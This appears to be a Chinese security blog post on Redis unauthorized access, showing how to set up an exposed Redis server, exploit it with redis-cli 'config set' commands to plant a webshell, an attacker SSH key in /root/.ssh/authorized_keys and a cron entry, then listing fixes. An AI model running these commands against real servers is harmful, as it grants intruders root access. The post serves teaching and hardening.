<!doctype html>



  


<html class="theme-next muse use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="redis," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.2" />






<meta name="description" content="漏洞概述Redis是一个开源的、支持网络、基于内存、键值对（key-value）存储数据库，提供多种语言的API，使用ANSI C编写。
Redis手动编译安装，默认的配置允许外部链接并且没有密码。如果Redis运行在root权限上，可以写任意文件。Redis默认开放端口是6379。">
<meta property="og:type" content="article">
<meta property="og:title" content="Redis未授权访问">
<meta property="og:url" content="http://yoursite.com/2016/11/29/Redis未授权访问/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="漏洞概述Redis是一个开源的、支持网络、基于内存、键值对（key-value）存储数据库，提供多种语言的API，使用ANSI C编写。
Redis手动编译安装，默认的配置允许外部链接并且没有密码。如果Redis运行在root权限上，可以写任意文件。Redis默认开放端口是6379。">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\1.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\2.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\3.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\4.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\5.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\6.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\7.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\8.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\9.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\10.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\11.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\12.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\13.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\14.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\15.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\16.png">
<meta property="og:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\17.png">
<meta property="og:updated_time" content="2016-12-08T08:05:12.393Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Redis未授权访问">
<meta name="twitter:description" content="漏洞概述Redis是一个开源的、支持网络、基于内存、键值对（key-value）存储数据库，提供多种语言的API，使用ANSI C编写。
Redis手动编译安装，默认的配置允许外部链接并且没有密码。如果Redis运行在root权限上，可以写任意文件。Redis默认开放端口是6379。">
<meta name="twitter:image" content="http://yoursite.com/\images\web安全\web中间件漏洞\redis\1.png">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Muse',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://yoursite.com/2016/11/29/Redis未授权访问/"/>


  <title> Redis未授权访问 | Hexo </title>
</head>

<body itemscope itemtype="//schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="//schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Hexo</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup">
 <span class="search-icon fa fa-search"></span>
 <input type="text" id="local-search-input">
 <div id="local-search-result"></div>
 <span class="popup-btn-close">close</span>
</div>


    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="//schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                Redis未授权访问
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-11-29T21:15:41+08:00" content="2016-11-29">
              2016-11-29
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/Web中间件漏洞/" itemprop="url" rel="index">
                    <span itemprop="name">Web中间件漏洞</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/11/29/Redis未授权访问/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/11/29/Redis未授权访问/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="漏洞概述"><a href="#漏洞概述" class="headerlink" title="漏洞概述"></a><strong>漏洞概述</strong></h2><pre><code>Redis是一个开源的、支持网络、基于内存、键值对（key-value）存储数据库，提供多种语言的API，使用ANSI C编写。
</code></pre><p>Redis手动编译安装，默认的配置允许外部链接并且没有密码。<br>如果Redis运行在root权限上，可以写任意文件。<br>Redis默认开放端口是6379。<br><a id="more"></a><br>    Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将 Redis 服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法，可以成功在 Redis 服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器。<br>一句话总结：对公网开放，且未启用认证的redis服务器<br>利用 Redis 自身的提供的 config 命令，可以进行写文件操作。</p>
<h2 id="安装Redis"><a href="#安装Redis" class="headerlink" title="安装Redis"></a><strong>安装Redis</strong></h2><h3 id="安装依赖程序"><a href="#安装依赖程序" class="headerlink" title="安装依赖程序"></a>安装依赖程序</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">yum install wget</div><div class="line">yum install gcc</div></pre></td></tr></table></figure>
<h3 id="获取安装文件、解压、进入目录"><a href="#获取安装文件、解压、进入目录" class="headerlink" title="获取安装文件、解压、进入目录"></a>获取安装文件、解压、进入目录</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">wget http://download.redis.io/releases/redis-3.2.3.tar.gz</div><div class="line">tar -xzf redis-3.2.3.tar.gz</div><div class="line">cd redis-3.2.3</div></pre></td></tr></table></figure>
<h3 id="编译安装"><a href="#编译安装" class="headerlink" title="编译安装"></a>编译安装</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">make</div></pre></td></tr></table></figure>
<p>如果没有提前安装gcc，编译时会报出以下错误：<br><img src="\images\web安全\web中间件漏洞\redis\1.png" alt="image"></p>
<p>make distclean 删除上次编译产生的垃圾文件<br>make<br><img src="\images\web安全\web中间件漏洞\redis\2.png" alt="image"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">make install</div></pre></td></tr></table></figure>
<p><img src="\images\web安全\web中间件漏洞\redis\3.png" alt="image"></p>
<h3 id="设置配置文件路径"><a href="#设置配置文件路径" class="headerlink" title="设置配置文件路径"></a>设置配置文件路径</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">mkdir -p /etc/redis</div><div class="line">cp redis.conf /etc/redis/redis.conf</div></pre></td></tr></table></figure>
<h3 id="修改配置文件"><a href="#修改配置文件" class="headerlink" title="修改配置文件"></a>修改配置文件</h3><p>(1)port 6379。这里可以修改端口，我不做修改<br><img src="\images\web安全\web中间件漏洞\redis\4.png" alt="image"></p>
<p>(2)是否已后台进程运行 daemonize on —-》yes<br><img src="\images\web安全\web中间件漏洞\redis\5.png" alt="image"></p>
<p>(3)允许其他IP地址访问，默认的是只有本机可以访问 bind 127.0.0.1 —-》0.0.0.0<br><img src="\images\web安全\web中间件漏洞\redis\6.png" alt="image"></p>
<h3 id="启动"><a href="#启动" class="headerlink" title="启动"></a>启动</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">/usr/local/bin/redis-server /etc/redis/redis.conf</div></pre></td></tr></table></figure>
<h3 id="查看启动情况"><a href="#查看启动情况" class="headerlink" title="查看启动情况"></a>查看启动情况</h3><p><img src="\images\web安全\web中间件漏洞\redis\7.png" alt="image"></p>
<h3 id="使用客户端redis-cli"><a href="#使用客户端redis-cli" class="headerlink" title="使用客户端redis-cli"></a>使用客户端redis-cli</h3><p><img src="\images\web安全\web中间件漏洞\redis\8.png" alt="image"></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a><strong>漏洞利用</strong></h2><blockquote>
<p>要求：能够利用运行在Root权限上的未授权的Redis进行任意文件写入</p>
</blockquote>
<h3 id="写webshell"><a href="#写webshell" class="headerlink" title="写webshell"></a>写webshell</h3><p>客户端连接服务器端：redis-cli -h 目标IP地址 -p 6379<br>在其web路径下写入一个php文件：<br><img src="\images\web安全\web中间件漏洞\redis\9.png" alt="image"></p>
<p>查看键值fllow的值：<br><img src="\images\web安全\web中间件漏洞\redis\10.png" alt="image"></p>
<p>访问成功：<br><img src="\images\web安全\web中间件漏洞\redis\11.png" alt="image"></p>
<p>写入webshell步骤跟这一样，写入的是一句话木马。</p>
<h3 id="写ssh-免密码登录"><a href="#写ssh-免密码登录" class="headerlink" title="写ssh 免密码登录"></a>写ssh 免密码登录</h3><p>原理：利用 Redis 自身的提供的 config 命令，可以进行写文件操作，攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中，进而可以直接使用对应的私钥登录目标服务器。</p>
<p>环境：本地主机：kali<br>      目标主机：远程VPN Centos</p>
<p>(1)准备工作，如果已经安装这些此步可省</p>
<p>** yum install ssh –&gt;安装SSH协议</p>
<p>yum install rsync –&gt;rsync是一个远程数据同步工具，可通过LAN/WAN快速同步多台主机间的文件</p>
<p>service sshd restart –&gt;启动服务**</p>
<p>(2)生成秘钥对<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ssh-keygen –t rsa –P &apos;&apos;</div></pre></td></tr></table></figure></p>
<p>生成的密钥对：id_rsa和id_rsa.pub<br>默认存储在”/home/用户/.ssh”目录或者root用户/root/.ssh/。</p>
<p><img src="\images\web安全\web中间件漏洞\redis\12.png" alt="image"></p>
<p>(3)把公钥放到目标服务器上（~/.ssh/authorized_keys）,自己保留好私钥<br>把id_rsa.pub追加到授权的key里：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">cat ~/.ssh/id_rsa.pub &gt;&gt; ~/.ssh/authorized_keys</div></pre></td></tr></table></figure></p>
<p>修改授权key的权限<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">chmod 600 ~/.ssh/authorized_keys</div></pre></td></tr></table></figure></p>
<p><img src="\images\web安全\web中间件漏洞\redis\13.png" alt="image"></p>
<p>(4)查看生成的公钥：<br><img src="\images\web安全\web中间件漏洞\redis\14.png" alt="image"></p>
<p>(5)本地redis客户端连接目标服务器：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">redis-cli -h 目标IP -p 6379</div></pre></td></tr></table></figure></p>
<p>(6)写入ssh公钥<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">config set dir /root/.ssh/</div><div class="line">config set dbfilename authorized_keys</div><div class="line">set xxxx &quot;\n\n\nssh-rsa key_pub\n\n\n&quot;</div></pre></td></tr></table></figure></p>
<p>其中key_pub为上图生成的公钥，即可将公钥保存在远端服务器，使得登录时不需要输入账号与密码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">Save</div></pre></td></tr></table></figure>
<p><img src="\images\web安全\web中间件漏洞\redis\15.png" alt="image"></p>
<p>(7)ssh 目标IP 或者 ssh -i is_rsa root@目标IP</p>
<p><img src="\images\web安全\web中间件漏洞\redis\16.png" alt="image"></p>
<p>连接成功！！！</p>
<h3 id="写计划任务"><a href="#写计划任务" class="headerlink" title="写计划任务"></a>写计划任务</h3><p>crontab -e命令来添加计划任务，即编辑/var/spool/cron下对应的用户的文件。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">config set dir /var/spool/cron</div><div class="line">config set dbfilename root</div><div class="line">set cron &quot;\n\n*/1 * * * * date &gt;&gt; /tmp/55.txt\n\n&quot;</div><div class="line">save</div></pre></td></tr></table></figure></p>
<p>Cat /tmp/55.txt</p>
<p><img src="\images\web安全\web中间件漏洞\redis\17.png" alt="image"></p>
<h2 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a><strong>修复方案</strong></h2><h3 id="指定redis服务使用的网卡-需要重启redis才能生效"><a href="#指定redis服务使用的网卡-需要重启redis才能生效" class="headerlink" title="指定redis服务使用的网卡(需要重启redis才能生效)"></a>指定redis服务使用的网卡(需要重启redis才能生效)</h3><p>在 redis.conf 文件中找到 “# bind 127.0.0.1” ，把前面的#号去掉，然后保存。注：修改后只有本机才能访问Redis。</p>
<h3 id="设置访问密码-需要重启redis才能生效"><a href="#设置访问密码-需要重启redis才能生效" class="headerlink" title="设置访问密码(需要重启redis才能生效)"></a>设置访问密码(需要重启redis才能生效)</h3><p>在 redis.conf 中找到“requirepass”字段，在后面填上你需要的密码，Redis客户端也需要使用此密码来访问Redis服务。</p>
<h3 id="修改Redis服务运行账号-需要重启redis才能生效"><a href="#修改Redis服务运行账号-需要重启redis才能生效" class="headerlink" title="修改Redis服务运行账号(需要重启redis才能生效)"></a>修改Redis服务运行账号(需要重启redis才能生效)</h3><p>请以较低权限账号运行Redis服务，且禁用该账号的登录权限。另外可以限制攻击者往敏感写入文件，但是Redis数据还是能被黑客访问到，或者被黑客恶意删除。</p>
<h3 id="设置防火墙策略"><a href="#设置防火墙策略" class="headerlink" title="设置防火墙策略"></a>设置防火墙策略</h3><p>如果正常业务中Redis服务需要被其他服务器来访问，可以设置iptables策略仅允许指定的IP来访问Redis服务。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/redis/" rel="tag">#redis</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/11/19/利用fcgi-exp对php-fpm进行远程利用/" rel="next" title="利用fcgi_exp对php-fpm进行远程利用">
                <i class="fa fa-chevron-left"></i> 利用fcgi_exp对php-fpm进行远程利用
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/11/30/Linux操作系统基础命令/" rel="prev" title="Linux操作系统基础命令">
                Linux操作系统基础命令 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        
<script>
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

      
    </div>
  </div>


          </div>
          

  <p>热评文章</p>
  <div class="ds-top-threads" data-range="weekly" data-num-items="4"></div>


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/11/29/Redis未授权访问/"
           data-title="Redis未授权访问" data-url="http://yoursite.com/2016/11/29/Redis未授权访问/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="//schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.jpg"
               alt="小黑胡" />
          <p class="site-author-name" itemprop="name">小黑胡</p>
          <p class="site-description motion-element" itemprop="description">深情不及久伴，厚爱无需多言。</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">18</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">21</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/ZhengSY1222" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.dadongge.ga" title="大栋哥" target="_blank">大栋哥</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.phodal.com" title="phodal" target="_blank">phodal</a>
                </li>
              
            </ul>
          </div>
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞概述"><span class="nav-number">1.</span> <span class="nav-text">漏洞概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#安装Redis"><span class="nav-number">2.</span> <span class="nav-text">安装Redis</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#安装依赖程序"><span class="nav-number">2.1.</span> <span class="nav-text">安装依赖程序</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#获取安装文件、解压、进入目录"><span class="nav-number">2.2.</span> <span class="nav-text">获取安装文件、解压、进入目录</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#编译安装"><span class="nav-number">2.3.</span> <span class="nav-text">编译安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#设置配置文件路径"><span class="nav-number">2.4.</span> <span class="nav-text">设置配置文件路径</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#修改配置文件"><span class="nav-number">2.5.</span> <span class="nav-text">修改配置文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#启动"><span class="nav-number">2.6.</span> <span class="nav-text">启动</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看启动情况"><span class="nav-number">2.7.</span> <span class="nav-text">查看启动情况</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#使用客户端redis-cli"><span class="nav-number">2.8.</span> <span class="nav-text">使用客户端redis-cli</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞利用"><span class="nav-number">3.</span> <span class="nav-text">漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#写webshell"><span class="nav-number">3.1.</span> <span class="nav-text">写webshell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#写ssh-免密码登录"><span class="nav-number">3.2.</span> <span class="nav-text">写ssh 免密码登录</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#写计划任务"><span class="nav-number">3.3.</span> <span class="nav-text">写计划任务</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#修复方案"><span class="nav-number">4.</span> <span class="nav-text">修复方案</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#指定redis服务使用的网卡-需要重启redis才能生效"><span class="nav-number">4.1.</span> <span class="nav-text">指定redis服务使用的网卡(需要重启redis才能生效)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#设置访问密码-需要重启redis才能生效"><span class="nav-number">4.2.</span> <span class="nav-text">设置访问密码(需要重启redis才能生效)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#修改Redis服务运行账号-需要重启redis才能生效"><span class="nav-number">4.3.</span> <span class="nav-text">修改Redis服务运行账号(需要重启redis才能生效)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#设置防火墙策略"><span class="nav-number">4.4.</span> <span class="nav-text">设置防火墙策略</span></a></li></ol></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">小黑胡</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.2"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"akiss-zsy"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/lib/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
       search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body").append('<div class="popoverlay">').css('overflow', 'hidden');
      $('.popup').toggle();

    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
    'use strict';
    $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
            // get the contents from search data
            isfetched = true;
            $('.popup').detach().appendTo('.header-inner');
            var datas = $( "entry", xmlResponse ).map(function() {
                return {
                    title: $( "title", this ).text(),
                    content: $("content",this).text(),
                    url: $( "url" , this).text()
                };
            }).get();
            var $input = document.getElementById(search_id);
            var $resultContent = document.getElementById(content_id);
            $input.addEventListener('input', function(){
                var matchcounts = 0;
                var str='<ul class=\"search-result-list\">';
                var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                $resultContent.innerHTML = "";
                if (this.value.trim().length > 1) {
                // perform local searching
                datas.forEach(function(data) {
                    var isMatch = false;
                    var content_index = [];
                    var data_title = data.title.trim().toLowerCase();
                    var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                    var data_url = decodeURIComponent(data.url);
                    var index_title = -1;
                    var index_content = -1;
                    var first_occur = -1;
                    // only match artiles with not empty titles and contents
                    if(data_title != '') {
                        keywords.forEach(function(keyword, i) {
                            index_title = data_title.indexOf(keyword);
                            index_content = data_content.indexOf(keyword);
                            if( index_title >= 0 || index_content >= 0 ){
                                isMatch = true;
								if (i == 0) {
                                    first_occur = index_content;
                                }
                            } 
							
                        });
                    }
                    // show search results
                    if (isMatch) {
                        matchcounts += 1;
                        str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                        var content = data.content.trim().replace(/<[^>]+>/g,"");
                        if (first_occur >= 0) {
                            // cut out 100 characters
                            var start = first_occur - 20;
                            var end = first_occur + 80;
                            if(start < 0){
                                start = 0;
                            }
                            if(start == 0){
                                end = 50;
                            }
                            if(end > content.length){
                                end = content.length;
                            }
                            var match_content = content.substring(start, end);
                            // highlight all keywords
                            keywords.forEach(function(keyword){
                                var regS = new RegExp(keyword, "gi");
                                match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                            });

                            str += "<p class=\"search-result\">" + match_content +"...</p>"
                        }
                        str += "</li>";
                    }
                })};
                str += "</ul>";
                if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
                if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
                $resultContent.innerHTML = str;
            });
            proceedsearch();
        }
    });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };

    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".popoverlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>


  

  

  

  


</body>
</html>
